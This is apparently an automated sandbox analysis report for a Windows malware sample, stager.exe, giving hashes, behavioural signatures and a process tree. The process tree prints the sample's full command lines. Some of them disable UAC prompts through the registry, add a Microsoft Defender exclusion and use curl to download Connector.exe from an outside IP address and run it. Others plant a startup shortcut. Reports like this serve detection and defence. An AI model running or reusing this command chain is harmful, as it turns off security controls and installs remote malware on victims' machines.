Analysis
  max time kernel: 152s
  max time network: 158s
  platform: windows10-2004_x64
  resource: win10v2004-20230703-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 19/07/2023, 13:01
Static task: static1
Behavioral task: behavioral1
  Sample: stager.exe
  Resource: win7-20230712-en
General
  Target: stager.exe
  Size: 1.9MB
  MD5: 4ed2a8948a165b72025d5868a31a34c8
  SHA1: b25b9db66eefe9418bb398a8a5ffe4aebb7d4ff8
  SHA256: 79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282
  SHA512: 64411bb2f3510f26114d809409dd9af29238fb1c43ee005c08c3b00826be0bce0230ad26afc786961b659d8cc470f59ed12108b4a11056b702a516330bbec380
  SSDEEP: 24576:GXjaqCL0DG3EZJOHVXGGUIHjNGxmKg7xf:GXjaADG3EWVd
Malware Config
Signatures
UAC bypass
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | reg.exe
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation | stager.exe
Drops startup file 1 IoCs
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Connector.lnk | stager.exe
Executes dropped EXE 1 IoCs
  pid | Process
  4636 | Connector.exe
Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
Modifies registry class 1 IoCs
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | stager.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
  pid | Process
  1268 | powershell.exe
  1268 | powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
  description | pid | Process
  Token: SeDebugPrivilege | 1268 | powershell.exe
Suspicious use of WriteProcessMemory 20 IoCs
  description | pid | Process | procid_target
  PID 4780 wrote to memory of 1148 | 4780 | stager.exe | 86
  PID 4780 wrote to memory of 1148 | 4780 | stager.exe | 86
  PID 1148 wrote to memory of 3020 | 1148 | cmd.exe | 87
  PID 1148 wrote to memory of 3020 | 1148 | cmd.exe | 87
  PID 4780 wrote to memory of 1088 | 4780 | stager.exe | 88
  PID 4780 wrote to memory of 1088 | 4780 | stager.exe | 88
  PID 1088 wrote to memory of 556 | 1088 | cmd.exe | 89
  PID 1088 wrote to memory of 556 | 1088 | cmd.exe | 89
  PID 4780 wrote to memory of 3572 | 4780 | stager.exe | 91
  PID 4780 wrote to memory of 3572 | 4780 | stager.exe | 91
  PID 4780 wrote to memory of 3900 | 4780 | stager.exe | 92
  PID 4780 wrote to memory of 3900 | 4780 | stager.exe | 92
  PID 3900 wrote to memory of 1268 | 3900 | cmd.exe | 93
  PID 3900 wrote to memory of 1268 | 3900 | cmd.exe | 93
  PID 4780 wrote to memory of 988 | 4780 | stager.exe | 94
  PID 4780 wrote to memory of 988 | 4780 | stager.exe | 94
  PID 988 wrote to memory of 4796 | 988 | cmd.exe | 95
  PID 988 wrote to memory of 4796 | 988 | cmd.exe | 95
  PID 4780 wrote to memory of 4636 | 4780 | stager.exe | 98
  PID 4780 wrote to memory of 4636 | 4780 | stager.exe | 98
Processes
  C:\Users\Admin\AppData\Local\Temp\stager.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\stager.exe"
    - Checks computer location settings
    - Drops startup file
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4780
      C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        - Suspicious use of WriteProcessMemory
        PID:1148
          C:\Windows\system32\reg.exe
            command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
            - UAC bypass
            PID:3020
      C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        - Suspicious use of WriteProcessMemory
        PID:1088
          C:\Windows\system32\reg.exe
            command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
            - UAC bypass
            PID:556
      C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c mkdir "C:\MicS"
        PID:3572
      C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
        - Suspicious use of WriteProcessMemory
        PID:3900
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:1268
      C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"
        - Suspicious use of WriteProcessMemory
        PID:988
          C:\Windows\system32\curl.exe
            command line: curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"
            PID:4796
      C:\MicS\Connector.exe
        command line: "C:\MicS\Connector.exe"
        - Executes dropped EXE
        PID:4636
Network
MITRE ATT&CK Enterprise v6
Downloads
  Filesize: 1.9MB
  MD5: d4f8be5303fc3c96545a4d259fe884c1
  SHA1: 251a4e6299c6b2f577ad25d6de765cca0e097750
  SHA256: 21c79c8aba3fd51e5c73f4d0b080763c8e3eef8f450df99c3686d3d0e21e18c0
  SHA512: 9a7212936cdec950db0ffb58767109df0142317378437a4c7d96b9b4a7c9d6613ae573e1689a986233fa4a5d86e51b00443c2afe57ef0f91fa0e59753f200658
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  Filesize: 659B
  MD5: 02e8749bd66771e8721ca6562582b593
  SHA1: cfedc0fc7bc4f0922fdacba822d36a0d556702ea
  SHA256: 5331a73d6b6a63561924907c1887ee349409698e30e068450dbde47803d08f67
  SHA512: acd391d49db843e8fb204fd657ed6b11617d44b379f1cef1f43dc48ebe6ae4ea7109c2716e485420aa55955578dbd6edd35a8a0cb84b44660afa0f374f893a73